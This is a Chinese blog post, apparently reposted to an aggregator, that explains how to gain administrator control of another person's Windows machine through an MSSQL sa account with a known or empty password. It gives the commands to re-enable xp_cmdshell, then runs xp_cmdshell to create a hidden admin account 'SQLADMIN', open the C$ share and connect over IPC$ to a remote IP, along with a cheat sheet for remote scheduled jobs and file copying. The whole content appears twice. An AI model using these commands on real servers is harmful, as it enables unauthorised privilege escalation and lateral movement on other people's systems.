通过SQL添加WINDOWS管理员方法
2015-03-27 09:26
155 查看
首先前提是知道对方数据库sa用户的密码,有的人在自己的计算机安装数据的时候,喜欢将数据库密码为空,这样留下的后患就是人家通过连接你的数据库,通过下面指令,可以在你的计算机上添加超级管理员帐号:
-- 基于安全考虑,MSSQL2005及以上版本默认禁用了xp_cmdshell。直接调用该扩展存储过程会提示:
-- SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。
-- 系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
-- 执行以下语句启用xp_cmdshell
-- 将开启语句的第二个1改成0再执行,xp_cmdshell就又处于禁用状态了
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
--查看密码密码规则
exec xp_cmdshell 'net accounts'
-- 添加用户SQLADMIN
exec xp_cmdshell 'net user/users SQLADMIN /add'
-- 给SQLADMIN用户分配管理员权限
exec xp_cmdshell 'net localgroup administrators SQLADMIN /add'
-- 删除SQLADMIN用户的管理员权限
exec xp_cmdshell 'net localgroup administrators SQLADMIN /delete'
-- 删除SQLADMIN用户
exec xp_cmdshell 'net user/users SQLADMIN /delete'
-- net share 共享名=路径 设置共享
exec xp_cmdshell 'net share c$=c:'
-- net share 共享名 /delete 删除IPC$共享
exec xp_cmdshell 'net share c$ /delete'
-- 建立远程IPC$连接
net use \\192.168.0.70\IPC$ “********” /user:administrator
-- 映射远程机器共享资源
net use x: \\192.168.0.70\C$
*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享
*net use 查看IPC$连接情况
*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
*net time \\ip 查看远程计算机上的时间
*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*ftp 服务器地址 进入FTP服务器
*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业
exec xp_cmdshell 'net user SQLADMIN qaz!23#d%e /add'
-- 基于安全考虑,MSSQL2005及以上版本默认禁用了xp_cmdshell。直接调用该扩展存储过程会提示:
-- SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。
-- 系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
-- 执行以下语句启用xp_cmdshell
-- 将开启语句的第二个1改成0再执行,xp_cmdshell就又处于禁用状态了
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
--查看密码密码规则
exec xp_cmdshell 'net accounts'
-- 添加用户SQLADMIN
exec xp_cmdshell 'net user/users SQLADMIN /add'
-- 给SQLADMIN用户分配管理员权限
exec xp_cmdshell 'net localgroup administrators SQLADMIN /add'
-- 删除SQLADMIN用户的管理员权限
exec xp_cmdshell 'net localgroup administrators SQLADMIN /delete'
-- 删除SQLADMIN用户
exec xp_cmdshell 'net user/users SQLADMIN /delete'
-- net share 共享名=路径 设置共享
exec xp_cmdshell 'net share c$=c:'
-- net share 共享名 /delete 删除IPC$共享
exec xp_cmdshell 'net share c$ /delete'
-- 建立远程IPC$连接
net use \\192.168.0.70\IPC$ “********” /user:administrator
-- 映射远程机器共享资源
net use x: \\192.168.0.70\C$
*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享
*net use 查看IPC$连接情况
*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
*net time \\ip 查看远程计算机上的时间
*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*ftp 服务器地址 进入FTP服务器
*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业
exec xp_cmdshell 'net user SQLADMIN qaz!23#d%e /add'
相关文章推荐
- Windows通过命令行批量添加删除IP的方法
- 通过 SQL Server 用户来添加Windows帐户并提升为管理员权限
- [转]通过SQL Server 用户来添加Windows帐户并提升为管理员权限
- SA权限添加管理员帐号的SQL命令与命令行下添加SQL用户的方法
- 通过sqlserver sa帐号在windows中添加用户并授权。
- 在ASP中通过SQL访问ACESS数据库的方法
- 通过一条sql语句访问不同数据库服务器中的数据库对象的方法(转载)
- *用Sql添加删除字段,判断字段是否存在的方法
- 通过SqlServer添加2003超级用户的方法
- 关于通过 SQL*PLUS 中用insert添加记录后在管理器看不到的问题
- 将用户添加到本地Windows管理员组
- 通过 prototype 为 JavaScript 的 String 对象添加方法(函数)
- 通过一条sql语句访问不同服务器中的数据库对象的方法
- SQL 中传数组参数的变通方法:通过字符串分拆实现
- windows副本无法通过验证的解决方法
- 命令行下添加SQL用户的方法
- Windows2000/xp通过修改注册表禁用程序的方法
- 用Sql添加删除字段,判断字段是否存在的方法
- 无法通过控制面板中的“添加/删除程序”来添加删除程序的解决方法
- SQL_SERVER 2005 通过链接服务器(Linked Server)访问 ORACLE 9i 的方法